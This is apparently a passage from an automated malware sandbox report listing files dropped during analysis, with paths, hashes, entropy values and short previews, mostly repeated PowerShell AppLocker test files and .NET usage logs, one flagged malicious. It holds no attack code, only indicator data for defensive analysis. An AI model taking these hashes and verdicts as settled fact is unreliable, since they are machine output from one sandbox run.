                                                  Category:dropped
                                                  Size (bytes):1306
                                                  Entropy (8bit):5.353303787007226
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                  MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                  SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                  SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                  SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

                                                  Download File
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulJnp/p:NllU
                                                  MD5:BC6DB77EB243BF62DC31267706650173
                                                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                  Malicious:false
                                                  Preview:@...e.................................X..............@..........

                                                  C:\Users\user\AppData\Local\Temp\RES4F01.tmp

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Aug 1 07:17:15 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1956
                                                  Entropy (8bit):4.54853216427565
                                                  Encrypted:false
                                                  SSDEEP:24:HZO9/O5tDfHEwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:j5xrKhmMluOulajfqXSfbNtmh1Z
                                                  MD5:B68074233CA8CC2D4564D113DED2E905
                                                  SHA1:45DAE4A50BE073EE39A899DBE6D68FC9AF3B2F92
                                                  SHA-256:95EE7C9B8552BCFFCF79B32FC3851E8DAFB65C4EF7A274799638ECCE70C45D75
                                                  SHA-512:8D03BA879E8D1161494CDC6F7AA656DFA3E3B3FD0F7EA61815CE6B6E31817BC2A91F0F66EB4EB9E00B0A0B1C30065670CAE21616030156FBBFF05A84A06B939A
                                                  Malicious:false
                                                  Preview:L...{6.f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES4F01.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sbfvuhv.swo.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xfxtu11.jpq.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2q55mnei.uy2.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x4cq010.zlj.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5vjy4jk.oqi.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc1vmdrk.4yf.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1agrxpz.2lz.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chuuo3jk.fn4.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnzvsbnq.opu.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht4qbocm.jh3.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_id0xcvte.vrt.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kafqsvhc.kg1.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lx2zj0ts.j10.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_occm2jgc.144.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qefyenp2.nan.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qq0e1mpm.mhj.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qscjcgj5.pjk.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ra5zxkag.z1w.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrqmu3a3.b4t.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rus44x40.h15.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sryevbwn.0gq.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twthq5vd.zgu.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1owajih.nj4.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3mred1t.egn.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
